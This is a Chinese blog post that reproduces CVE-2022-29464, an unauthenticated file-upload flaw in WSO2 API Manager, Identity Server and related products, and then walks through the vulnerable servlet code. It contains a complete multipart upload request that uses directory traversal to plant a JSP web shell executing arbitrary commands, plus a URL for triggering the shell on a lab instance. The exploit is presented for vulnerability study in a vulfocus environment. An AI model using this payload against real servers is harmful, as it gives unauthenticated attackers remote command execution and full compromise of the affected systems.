1. Toy模板网首页
  2. > Toy博客

漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)

9月前 作者:FODKING 分类:Toy博客 阅读(45) 违法举报

这篇具有很好参考价值的文章主要介绍了漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

附件二:漏洞详情提交文件模板
1.漏洞描述
CVE-2022-29464 是 Orange Tsai发现的 WSO2 上的严重漏洞。该漏洞是⼀种未经身份验证的⽆ 限制任意⽂件上传,允许未经身份验证的攻击者通过上传恶意 JSP ⽂件在 WSO2 服务器上获得RCE。
2.漏洞影响
这会影响到:
WSO2 API Manager 2.2.0 及更高版本到 4.0.0;
WSO2 Identity Server 5.2.0 及以上至 5.11.0;
WSO2 身份服务器分析 5.4.0、5.4.1、5.5.0 和 5.6.0;
WSO2 身份服务器作为密钥管理器 5.3.0 及更高版本至 5.10.0;
WSO2 Enterprise Integrator 6.2.0 及更高版本至 6.6.0。
3.漏洞复现步骤
拉取vulfocus的环境
漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)

漏洞位置:/fileupload/toolsAny

漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)

上传1.jsp的恶意文件
POST 传包
增填报文信息

--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"

<FORM>
    <INPUT name='cmd' type=text>
    <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%>
        <pre><%=output %></pre>
--4ef9f369a86bfaadf5ec3177278d49c0--

上传成功后访问https://123.58.236.76:22416/authenticationendpoint/1.jsp?cmd=ls
漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)

漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)

分析:
该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意 JSP 文件在 WSO2 服务器上获得 RCE
宜受攻击的上传路由是/fileupload由FileUploadServlet处理的。Indentity.xml正如在配置文件上一样,他是不受IAM保护的路由:

并且不受默认登录措施保护的。handleSecurity()是负责保护 WSO2 服务的不同路由的功能并提供一种对收到的 HTTP 请求执行安全检查的机制,handleSecurity()将调用CarbonUILoginUtil.handleLoginPageRequest()并根据其返回值决定允许或拒绝访问请求的 URI:

漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)

CarbonUILoginUtil.handleLoginPageRequest()当CarbonUILoginUtil.RETURN_TRUE路线为/fileupload:
使用CarbonUILoginUtil.handleLoginPageRequest()返回CarbonUILoginUtil.RETURN_TRUE,handleSecurity()将返回true,然后将授予访问权限而/fileupload无需身份验证。

漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)

首先要确保是一个多部分的poat请求,然后提取上传文件,在确定是否包含一个或多个文件,并根据文件大小进行验证。从返回后parseRequest(),executeGeneric()现在将调用被以下execute()方法覆盖的方法ToolsAnyFileUploadExecutor:

漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)

已知execute是很容易就受到目录遍历的方法,因为它没有转义tmp目录,并且信任用户上传的文件名。文件保存在:
漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)文章来源地址https://www.toymoban.com/news/detail-403735.html

到了这里,关于漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现

    免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!! 大华智慧园区

    2024年02月09日
    浏览(45)
  • CVE-2022-30887漏洞复现

    CVE-2022-30887漏洞复现

    多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传

    2023年04月08日
    浏览(47)
  • CVE漏洞复现-CVE-2022-22965-Spring-RCE漏洞

    CVE漏洞复现-CVE-2022-22965-Spring-RCE漏洞

    Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行

    2023年04月21日
    浏览(58)
  • 漏洞复现 | Apache Shiro 授权绕过漏洞(CVE-2022-32532)

    漏洞复现 | Apache Shiro 授权绕过漏洞(CVE-2022-32532)

    0x00 漏洞描述         Apache Shiro 是一套用于执行认证、授权、加密和会话管理的 Java 安全框架。2022年06月29日 APache 官方发布了一则关于 Apache Shiro 的安全通告,Apache Shiro 1.9.1 前的版本 RegExPatternMatcher 在使用带有 “.” 的正则时,可能会导致权限绕过。漏洞源于 RegExPatter

    2024年02月02日
    浏览(38)
  • Cacti命令执行漏洞复现(CVE-2022-46169)

    Cacti命令执行漏洞复现(CVE-2022-46169)

    Cacti项目是一个开源平台,可为用户提供强大且可扩展的操作监控和故障管理框架。在1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。漏洞编号:CVE-2022-46169,漏洞等级:严重。 影响版本 Cacti == 1.2.22 不受影响版本

    2024年02月02日
    浏览(85)

  • Nftables栈溢出漏洞(CVE-2022-1015)复现

    背景介绍 Nftables 是一个基于内核的包过滤框架,用于 Linux操作系统中的网络安全和防火墙功能。nftables的设计目标是提供一种更简单、更灵活和更高效的方式来管理网络数据包的流量。 钩子点的作用是拦截数据包,然后对数据包进行修改,比较,丢弃和放行等操作。 Nftable

    2024年02月12日
    浏览(42)
  • CVE-2022-33891漏洞原理、环境搭建和复现

    CVE-2022-33891漏洞原理、环境搭建和复现

    最近有幸参与了某地市的攻防演练,在扫描器漏洞都被提交了之后,大杀器也逐渐开始浮出水面,其中就包含今天的主角:apache spark的rce。 Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎。与 Hadoop 不同,Spark 和 Scala 能够紧密集成,其中的 Scala 可以像操作本地

    2024年02月13日
    浏览(36)
  • CVE -2022-26134漏洞复现(Confluence OGNL 注入rce漏洞)

    CVE -2022-26134漏洞复现(Confluence OGNL 注入rce漏洞)

    0x01 Atlassian Confluence Atlassian Confluence是一个专业的企业知识管理与协同软件,主要用于公司内员工创建知识库并建立知识管理流程,也可以用于构建企业wiki。其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。因此

    2024年02月16日
    浏览(46)

  • Django SQL注入漏洞复现 (CVE-2022-28347)

    ​ 在Django 2.2 的 2.2.28 之前版本、3.2 的 3.2.13 之前版本和 4.0 的 4.0.4 之前版本中的 QuerySet.deexplain() 中发现了SQL注入问题。这是通过传递一个精心编制的字典(带有字典扩展)作为**options参数来实现的,并将注入负载放置在选项名称中。 2.2 = Django 2.2.28 3.2 = Django 3.2.13 4.0 = Djan

    2024年02月05日
    浏览(86)
  • CVE漏洞复现-CVE-2022-22947-Spring Cloud Gateway RCE

    CVE漏洞复现-CVE-2022-22947-Spring Cloud Gateway RCE

    微服务架构与Spring Cloud 最开始时,我们开发java项目时,所有的代码都在一个工程里,我们把它称为单体架构。当我们的项目的代码量越来越大时,开发的成员越来越多时,这时我们项目的性能以及我们开发的效率都会存在非常大的问题,所以对于这样的项目,我们需要把它

    2023年04月14日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包